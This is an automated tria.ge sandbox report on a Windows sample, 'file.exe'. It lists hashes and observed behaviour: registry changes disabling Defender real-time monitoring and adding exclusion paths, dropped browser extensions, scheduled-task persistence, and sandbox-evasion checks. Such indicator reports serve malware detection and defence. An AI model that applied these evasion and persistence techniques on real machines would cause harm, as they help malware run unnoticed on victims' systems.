Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
21/11/2023, 10:15
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20231020-en
General
-
Target
file.exe
-
Size
7.1MB
-
MD5
148ac3c1dd4761fb48f2c92be04ece34
-
SHA1
462c861101813339b423b3db9575d2c692ec758d
-
SHA256
44d099fe20a392c3e647a6a589f20923cb7937931c6ff379828661e129110979
-
SHA512
5ef132edb43bdba2b634a2d914e59be47941b3644cdbf8bc8e271d95b851208b7da4c49defafe3b30550e9489a172ebfaf77b5af1900ed993f40010bc34c6108
-
SSDEEP
196608:91O1TzDtD7vGjEjmlZ7NSTcaUI/8Rxa8NIKC3K4kIKld:3OPD7vMPlRPa/URj+KQKxld
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qnfVUcymejUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nLtdqPxSU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kTkhuvRgNyZU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\ORLhyEwmHZTZsrVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VruDcINppTZNIqemGVR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VruDcINppTZNIqemGVR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\prcciRLxuAmrJUJV = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nLtdqPxSU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NWoXnskKXdJGC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\ORLhyEwmHZTZsrVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\prcciRLxuAmrJUJV = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\prcciRLxuAmrJUJV = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kTkhuvRgNyZU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qnfVUcymejUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NWoXnskKXdJGC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\prcciRLxuAmrJUJV = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 2908 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1154728922-3261336865-3456416385-1000\Control Panel\International\Geo\Nation nVdChUm.exe -
Executes dropped EXE 4 IoCs
pid Process 2140 Install.exe 2120 Install.exe 1036 eGpoUau.exe 2932 nVdChUm.exe -
Loads dropped DLL 12 IoCs
pid Process 2032 file.exe 2140 Install.exe 2140 Install.exe 2140 Install.exe 2140 Install.exe 2120 Install.exe 2120 Install.exe 2120 Install.exe 2908 rundll32.exe 2908 rundll32.exe 2908 rundll32.exe 2908 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json nVdChUm.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json nVdChUm.exe -
Drops file in System32 directory 21 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol eGpoUau.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA nVdChUm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA nVdChUm.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol nVdChUm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 nVdChUm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B nVdChUm.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol eGpoUau.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA nVdChUm.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini eGpoUau.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA nVdChUm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 nVdChUm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B nVdChUm.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat nVdChUm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 nVdChUm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 nVdChUm.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\VruDcINppTZNIqemGVR\FlHfZUQ.xml nVdChUm.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak nVdChUm.exe File created C:\Program Files (x86)\kTkhuvRgNyZU2\CICKOMF.xml nVdChUm.exe File created C:\Program Files (x86)\nLtdqPxSU\ZTIPqGn.xml nVdChUm.exe File created C:\Program Files (x86)\NWoXnskKXdJGC\BOnjvVQ.xml nVdChUm.exe File created C:\Program Files (x86)\kTkhuvRgNyZU2\TnZoYvDrneThV.dll nVdChUm.exe File created C:\Program Files (x86)\qnfVUcymejUn\LSYfmmL.dll nVdChUm.exe File created C:\Program Files (x86)\nLtdqPxSU\novreh.dll nVdChUm.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja nVdChUm.exe File created C:\Program Files (x86)\VruDcINppTZNIqemGVR\zpRaecl.dll nVdChUm.exe File created C:\Program Files (x86)\NWoXnskKXdJGC\RJVLHnZ.dll nVdChUm.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi nVdChUm.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi nVdChUm.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bfQCIeAfoMUjiMvHpK.job schtasks.exe File created C:\Windows\Tasks\PYxBkvPuMRnFgrady.job schtasks.exe File created C:\Windows\Tasks\puEiLMJPChlWPyy.job schtasks.exe File created C:\Windows\Tasks\UlrsxbhsbQOtZaLyo.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 768 schtasks.exe 304 schtasks.exe 2820 schtasks.exe 2600 schtasks.exe 2528 schtasks.exe 2468 schtasks.exe 2256 schtasks.exe 1732 schtasks.exe 1728 schtasks.exe 1772 schtasks.exe 1644 schtasks.exe 2740 schtasks.exe 1596 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs nVdChUm.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00c1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 nVdChUm.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-47-75-bb-d2-85\WpadDecisionTime = a066c1db631cda01 nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-47-75-bb-d2-85 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6066ED6C-9084-4683-B5F0-766A74F9A6F9}\76-47-75-bb-d2-85 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 nVdChUm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6066ED6C-9084-4683-B5F0-766A74F9A6F9}\WpadDecisionReason = "1" nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6066ED6C-9084-4683-B5F0-766A74F9A6F9}\76-47-75-bb-d2-85 nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates nVdChUm.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 nVdChUm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00c1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" nVdChUm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-47-75-bb-d2-85\WpadDecisionReason = "1" nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs nVdChUm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-47-75-bb-d2-85\WpadDetectedUrl rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-47-75-bb-d2-85\WpadDecisionTime = a066c1db631cda01 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6066ED6C-9084-4683-B5F0-766A74F9A6F9}\WpadNetworkName = "Network 3" nVdChUm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-47-75-bb-d2-85\WpadDecision = "0" nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs nVdChUm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" nVdChUm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-47-75-bb-d2-85\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople nVdChUm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6066ED6C-9084-4683-B5F0-766A74F9A6F9} nVdChUm.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6066ED6C-9084-4683-B5F0-766A74F9A6F9}\WpadDecisionTime = a066c1db631cda01 nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-47-75-bb-d2-85 nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates nVdChUm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA nVdChUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs nVdChUm.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 3024 powershell.EXE 3024 powershell.EXE 3024 powershell.EXE 1856 powershell.EXE 1856 powershell.EXE 1856 powershell.EXE 1700 powershell.EXE 1700 powershell.EXE 1700 powershell.EXE 1416 powershell.EXE 1416 powershell.EXE 1416 powershell.EXE 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe 2932 nVdChUm.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3024 powershell.EXE Token: SeDebugPrivilege 1856 powershell.EXE Token: SeDebugPrivilege 1700 powershell.EXE Token: SeDebugPrivilege 1416 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2032 wrote to memory of 2140 2032 file.exe 28 PID 2032 wrote to memory of 2140 2032 file.exe 28 PID 2032 wrote to memory of 2140 2032 file.exe 28 PID 2032 wrote to memory of 2140 2032 file.exe 28 PID 2032 wrote to memory of 2140 2032 file.exe 28 PID 2032 wrote to memory of 2140 2032 file.exe 28 PID 2032 wrote to memory of 2140 2032 file.exe 28 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2120 wrote to memory of 2932 2120 Install.exe 31 PID 2120 wrote to memory of 2932 2120 Install.exe 31 PID 2120 wrote to memory of 2932 2120 Install.exe 31 PID 2120 wrote to memory of 2932 2120 Install.exe 31 PID 2120 wrote to memory of 2932 2120 Install.exe 31 PID 2120 wrote to memory of 2932 2120 Install.exe 31 PID 2120 wrote to memory of 2932 2120 Install.exe 31 PID 2120 wrote to memory of 2684 2120 Install.exe 33 PID 2120 wrote to memory of 2684 2120 Install.exe 33 PID 2120 wrote to memory of 2684 2120 Install.exe 33 PID 2120 wrote to memory of 2684 2120 Install.exe 33 PID 2120 wrote to memory of 2684 2120 Install.exe 33 PID 2120 wrote to memory of 2684 2120 Install.exe 33 PID 2120 wrote to memory of 2684 2120 Install.exe 33 PID 2684 wrote to memory of 2752 2684 forfiles.exe 36 PID 2684 wrote to memory of 2752 2684 forfiles.exe 36 PID 2684 wrote to memory of 2752 2684 forfiles.exe 36 PID 2684 wrote to memory of 2752 2684 forfiles.exe 36 PID 2684 wrote to memory of 2752 2684 forfiles.exe 36 PID 2684 wrote to memory of 2752 2684 forfiles.exe 36 PID 2684 wrote to memory of 2752 2684 forfiles.exe 36 PID 2932 wrote to memory of 2756 2932 forfiles.exe 35 PID 2932 wrote to memory of 2756 2932 forfiles.exe 35 PID 2932 wrote to memory of 2756 2932 forfiles.exe 35 PID 2932 wrote to memory of 2756 2932 forfiles.exe 35 PID 2932 wrote to memory of 2756 2932 forfiles.exe 35 PID 2932 wrote to memory of 2756 2932 forfiles.exe 35 PID 2932 wrote to memory of 2756 2932 forfiles.exe 35 PID 2756 wrote to memory of 2748 2756 cmd.exe 38 PID 2756 wrote to memory of 2748 2756 cmd.exe 38 PID 2756 wrote to memory of 2748 2756 cmd.exe 38 PID 2756 wrote to memory of 2748 2756 cmd.exe 38 PID 2756 wrote to memory of 2748 2756 cmd.exe 38 PID 2756 wrote to memory of 2748 2756 cmd.exe 38 PID 2756 wrote to memory of 2748 2756 cmd.exe 38 PID 2752 wrote to memory of 2632 2752 cmd.exe 37 PID 2752 wrote to memory of 2632 2752 cmd.exe 37 PID 2752 wrote to memory of 2632 2752 cmd.exe 37 PID 2752 wrote to memory of 2632 2752 cmd.exe 37 PID 2752 wrote to memory of 2632 2752 cmd.exe 37 PID 2752 wrote to memory of 2632 2752 cmd.exe 37 PID 2752 wrote to memory of 2632 2752 cmd.exe 37 PID 2756 wrote to memory of 2696 2756 cmd.exe 40 PID 2756 wrote to memory of 2696 2756 cmd.exe 40 PID 2756 wrote to memory of 2696 2756 cmd.exe 40 PID 2756 wrote to memory of 2696 2756 cmd.exe 40 PID 2756 wrote to memory of 2696 2756 cmd.exe 40 PID 2756 wrote to memory of 2696 2756 cmd.exe 40 PID 2756 wrote to memory of 2696 2756 cmd.exe 40 PID 2752 wrote to memory of 2584 2752 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2032 -
